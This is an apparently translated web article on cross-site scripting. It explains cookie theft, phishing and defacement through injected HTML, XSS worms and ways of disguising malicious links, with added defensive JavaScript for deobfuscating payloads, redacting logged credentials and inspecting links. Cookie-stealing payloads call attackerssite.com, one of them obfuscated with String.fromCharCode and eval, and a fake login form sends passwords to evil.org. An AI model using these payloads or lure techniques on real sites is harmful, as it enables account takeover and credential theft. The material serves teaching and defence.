In-depth analysis of cross-site scripting attacks: cross-site scripting hazards and cookie theft

Source: Internet
Author: User

The name cross-site scripting comes from the fact that one Web site (or person) can inject code of their choosing across the security boundary into a different, vulnerable Web site. When the injected code executes in the victim's browser as if it were the target site's own code, attackers can steal sensitive data and force the user to perform unintended actions.
In the previous article, we detailed the process of exploiting cross-site scripting vulnerabilities and analysed HTML injection in depth. This article describes the dangers of cross-site scripting in detail and how attackers trick victims; finally, it introduces defense measures against cross-site scripting attacks.

I. Hazards of Cross-Site Scripting

XSS is an attack on the users of a Web application. By posing as the attacked user, attackers can fully control the Web application, even when it sits behind a firewall and the attacker cannot reach it directly. XSS generally does not damage users' machines or the Web application server directly. A successful attacker can do three things:

Cookie Theft

Impersonate Web applications in front of compromised users

Impersonate victim users in front of Web Applications

II. Cookie Theft

Cookies generally control access to Web applications. If an attacker steals a victim's cookie, he can use it to take complete control of the victim's account. The best practice for cookies is to let them expire after a period of time, so that an attacker can only access the victim's account for a limited window. The following code steals cookies:

var x = new Image(); x.src = "http://attackerssite.com/eatMoreCookies?c=" + document.cookie;

Or, equivalently:

document.write("<img src=http://attackerssite.com/eatMoreCookies?c=" + document.cookie + ">");


If some characters are not allowed, convert each character to its ASCII decimal code and use JavaScript's String.fromCharCode() function. The following JavaScript is equivalent to the first snippet above:

// decodes to: var x=new Image();x.src='http://attackerssite.com/eatMoreCookies?c='+document.cookie;
eval(String.fromCharCode(118,97,114,32,120,61,110,101,119,32,73,109,97,103,101,40,41,59,
120,46,115,114,99,61,39,104,116,116,112,58,47,47,
97,116,116,97,99,107,101,114,115,115,105,116,101,46,99,111,109,47,
101,97,116,77,111,114,101,67,111,111,107,105,101,115,63,99,61,39,43,
100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59));
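As an added example (not part of the original article), the following Node.js code decodes this kind of String.fromCharCode() obfuscation statically, without eval, so an analyst reviewing an injected payload can read what it does; it also resolves \xHH and \uHHHH escapes, which the article does not discuss. SUSPICIOUS, decodeCharCodes, decodeEscapes, analyzePayload and the sample payload are my own names and constructions.

```javascript
// Added example, not from the original article: decode String.fromCharCode()
// obfuscation statically (no eval) and report what the payload references.
// SUSPICIOUS, decodeCharCodes, decodeEscapes and analyzePayload are my own names.
const SUSPICIOUS = ['document.cookie', 'eval(', 'new Image', '.src=', 'document.write', 'innerHTML'];

// Replace every String.fromCharCode(n1, n2, ...) call with the string literal it builds.
function decodeCharCodes(source) {
  const call = /String\s*\.\s*fromCharCode\s*\(\s*([\d\s,]*)\)/g;
  return source.replace(call, (_, list) => {
    const codes = list.split(',').map(s => s.trim()).filter(Boolean).map(Number);
    return JSON.stringify(String.fromCharCode(...codes));
  });
}

// Also resolve \xHH and \uHHHH escapes, a second disguise for the same strings.
function decodeEscapes(source) {
  return source.replace(/\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})/g,
    (_, h2, h4) => String.fromCharCode(parseInt(h2 || h4, 16)));
}

// Decode, then list which sensitive constructs the readable form contains.
function analyzePayload(source) {
  const decoded = decodeEscapes(decodeCharCodes(source));
  const flat = decoded.replace(/\s+/g, '');
  const hits = SUSPICIOUS.filter(k => flat.includes(k.replace(/\s+/g, '')));
  return { decoded, hits, suspicious: hits.length > 0 };
}

// Constructed sample: "document.cookie" hidden as character codes inside eval().
const SAMPLE = 'eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));';
```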

III. Phishing Attacks

Attackers can use XSS for social engineering with a fake version of the Web application. After a successful XSS attack, the attacker completely controls the appearance of the Web application. This can be used to deface the site; for example, the attacker can replace the page with an unwelcome image. One common choice is an image reading Stall0wn3d, which means "you are hacked".

The following is the HTML injection string for this attack:

<script>document.body.innerHTML = "<img src=http://www.bkjia.com/uploads/allimg/131121/2211322534-0.jpg>";</script>


Controlling the appearance of the Web application in front of compromised users, however, offers more than just displaying a defacement image. Attackers can launch phishing attacks that force users to hand confidential information to the attacker. Using document.body.innerHTML, the attacker presents a login page that looks exactly like the vulnerable Web application's real login page and is served from the domain into which the HTML was injected; but when the form is submitted, the data is sent to a site of the attacker's choosing.

So when the victim enters his or her username and password, the information falls into the attacker's hands. The code is as follows:

document.body.innerHTML = "<form action=http://evil.org/grabPasswords method=get><p>User name: <input type=text name=u><p>Password: <input type=password name=p><input type=submit name=login></form>";

One trick with this code is that the form is submitted via a GET request. This way the attacker does not even need to write a grabPasswords page, because the request, with the username and password in its query string, is written to the Web server's error log, from which the information can easily be read.
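The consequence just described, credentials submitted by GET landing verbatim in the server's log, is what this added example (not part of the original article) detects and masks on constructed access-log lines. The CLF-style log format, the credential field names, the sample lines and the helper names are my own assumptions.

```javascript
// Added example, not from the original article: find credential fields that
// were submitted by GET and therefore sit verbatim in the Web server's access
// log, then mask them. CREDENTIAL_FIELDS, parseRequest, findLeakedCredentials,
// redactLine, scanLog and the log lines are my own assumptions (CLF-style format).
const CREDENTIAL_FIELDS = new Set(['u', 'p', 'user', 'username', 'pass', 'passwd', 'password', 'pwd']);

// Pull the path and query parameters out of a CLF request line; null if not a GET.
function parseRequest(line) {
  const m = /"GET\s+(\S+)\s+HTTP\/[\d.]+"/.exec(line);
  if (!m) return null;
  const url = new URL(m[1], 'http://placeholder.invalid');  // base only to parse a relative path
  return { path: url.pathname, params: url.searchParams };
}

// Names of credential-like query parameters present in one log line.
function findLeakedCredentials(line) {
  const req = parseRequest(line);
  if (!req) return [];
  return [...req.params.keys()].filter(k => CREDENTIAL_FIELDS.has(k.toLowerCase()));
}

// Same line with credential values masked, so the log can be retained safely.
function redactLine(line) {
  return line.replace(/([?&])([^=&\s"]+)=([^&\s"]*)/g, (all, sep, key) =>
    CREDENTIAL_FIELDS.has(key.toLowerCase()) ? `${sep}${key}=[REDACTED]` : all);
}

// Constructed log lines (not real traffic): a phished login submitted by GET, then a normal search.
const SAMPLE_LOG = [
  '203.0.113.9 - - [21/Nov/2013:22:11:32 +0000] "GET /grabPasswords?u=alice&p=Hunter2&login=Submit HTTP/1.1" 404 162',
  '203.0.113.9 - - [21/Nov/2013:22:12:01 +0000] "GET /search?q=kittens HTTP/1.1" 200 5120',
];

// One finding per line: which fields leaked and the masked line.
function scanLog(lines) {
  return lines.map(line => ({ leaked: findLeakedCredentials(line), redacted: redactLine(line) }));
}
```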


IV. Impersonating Victims

The biggest impact of XSS on Web applications is that attackers can use it to impersonate legitimate users. The following are some things attackers can do.

In a webmail application, attackers can:

Send email in the name of the user

Obtain the user's contact list

Change automatic BCC attributes

Change privacy/logging settings

In Web-based instant messaging or chat software, attackers can:

Get contact list

Send messages to contacts

Add/delete contacts

In a Web-based online banking or financial system, attackers can:

Withdraw funds

Apply for a credit card

Change address

In the E-commerce system, attackers can:

Purchase items

Whenever we analyse the impact of XSS on a site, think about what the attacker could do if he controlled the victim's mouse and keyboard, and what the victim's computer can reach on the victim's intranet. To impersonate users, attackers need to understand how the Web application works. Sometimes this can be done by reading the page source, but the best way is to use a Web proxy such as Burp Suite, WebScarab or Paros Proxy.

These Web proxies intercept all traffic between the Web browser and the Web server, including traffic sent over HTTPS. Recording these sessions shows exactly what data the Web application sends to the server, which is very helpful for working out how to impersonate a user to the application. Web proxies are also very useful for discovering XSS and other Web application vulnerabilities.


V. XSS Worms

Web applications that are constantly online, such as webmail, social networks, chat rooms, online multiplayer games, online casinos, and in general any Web application that requires user interaction and passes some form of information between users, are vulnerable to XSS worms. An XSS worm exploits the features of the Web application itself for its own propagation. For example, an XSS worm in a webmail application lets the attacker capture the victim's contact list and send email.

When the victim clicks the link pointing to the HTML injection, the XSS is activated and the script executes. The script looks up the victim's contact list and sends an email to each contact. Each contact receives an email from a trusted sender (the victim) inviting them to click a link. Once a contact clicks the link, he becomes another victim, and his own contacts receive a message from him.

An XSS worm spreads extremely quickly: it can infect many users in a short time and generate a large amount of network traffic. It is also very effective for spreading other attacks, such as phishing. More interestingly, attackers sometimes add hidden HTML content to the Web application to launch multiple attacks on the browser. If the user's Web browser is not up to date, the attacker can take complete control of the user's machine. In that case, XSS serves as the delivery mechanism for attacks on other vulnerabilities.

The sections above describe the dangers of cross-site scripting and how attackers trick victims.

VI. Capturing Victims

We now know how to find HTML injection points and what an attacker can do once he gets a user to click a link pointing to the injected HTML. Sometimes the injected HTML is activated during normal user interaction; there are many effective methods. In general, however, the attacker must get the user to click a link pointing to the injected HTML code to start the attack. This section briefly discusses how victims are enticed into clicking such a link.

Now assume you are the attacker. Suppose you find that HTML can be injected via the p parameter of http://search.engine.com/search?p= and you host a malicious script at http://evil.org/e.js. You then only need to get people to click the following link:

http://search.engine.com/search?p=

But how many people will click that link? Anyone with a little computer knowledge can see at a glance that clicking it will not lead anywhere good. Attackers therefore need to disguise the link and entice users to click something more attractive.

VII. Hiding Links to Injected HTML

Links can be concealed in different ways: with anchor tags, via URL-shortening sites, and via blogs and Web sites controlled by the attacker.

The first suggestion is very simple. Most Web applications automatically wrap an anchor tag around URLs so that users can follow the link. If an attacker can write his own hyperlink, as in a webmail application, he can construct a link like the following:


http://goodsite.com/cuteKittens.jpg

The visible text shows a harmless URL, but the link actually points to the attacker's HTML injection (that is, the user who clicks it actually requests the HTML injected by the attacker).

Web applications that shorten URLs, such as TinyURL, YATUC, ipulink.com, get-shorty.com (and every site running the get-shorty software), turn long URLs into short ones. These sites work by mapping a long URL to a short URL and redirecting the short URL to the long one.

Because the short URL hides the long one, it is easier to win the trust of people (even fairly experienced computer users) and get them to click the malicious link. For example, the following HTML injection is easy to spot:

http://search.engine.com/search?p=

It can be mapped to a separate URL such as:

http://tinyurl.com/2optv9

Currently, only highly vigilant computer users recognise URL-shortening services like TinyURL. By using a less well-known Web application that offers URL shortening, the attacker can catch even more experienced computer users.
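From the defender's side, this added example (not part of the original article) inspects a hyperlink for the disguises described in sections VI and VII: visible text naming a different host than the href, an href pointing at a URL-shortening service, and query parameters that carry HTML markup. The helper names, the shortener list and the sample links are my own assumptions.

```javascript
// Added example, not from the original article: inspect a hyperlink for the
// disguises described above. URL_SHORTENERS, hostOf, inspectLink, inspectAll and
// SAMPLE_LINKS are my own names; the shortener list and samples are constructed.
const URL_SHORTENERS = new Set(['tinyurl.com', 'ipulink.com', 'get-shorty.com']);

// Hostname of an absolute URL, or null when the text is not a URL at all.
function hostOf(text) {
  try { return new URL(text).hostname.toLowerCase(); } catch (e) { return null; }
}

// Returns the reasons a link deserves suspicion; an empty array means none found.
function inspectLink(href, visibleText) {
  const reasons = [];
  const target = hostOf(href);
  if (!target) return ['href is not a parseable absolute URL'];
  const shown = hostOf(visibleText.trim());
  if (shown && shown !== target) {
    reasons.push(`text shows ${shown} but href goes to ${target}`);
  }
  if (URL_SHORTENERS.has(target)) {
    reasons.push(`href uses URL shortener ${target}, real destination hidden`);
  }
  for (const [name, value] of new URL(href).searchParams) {
    if (/<\s*[a-z!\/]/i.test(value) || /javascript:/i.test(value)) {
      reasons.push(`parameter "${name}" carries HTML markup or script`);
    }
  }
  return reasons;
}

// Constructed samples mirroring the three cases in the text.
const SAMPLE_LINKS = [
  { href: 'http://search.engine.com/search?p=<script src=http://evil.org/e.js></script>', text: 'http://goodsite.com/cuteKittens.jpg' },
  { href: 'http://tinyurl.com/2optv9', text: 'http://tinyurl.com/2optv9' },
  { href: 'http://goodsite.com/cuteKittens.jpg', text: 'cute kittens' },
];

function inspectAll(links) {
  return links.map(l => inspectLink(l.href, l.text));
}
```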
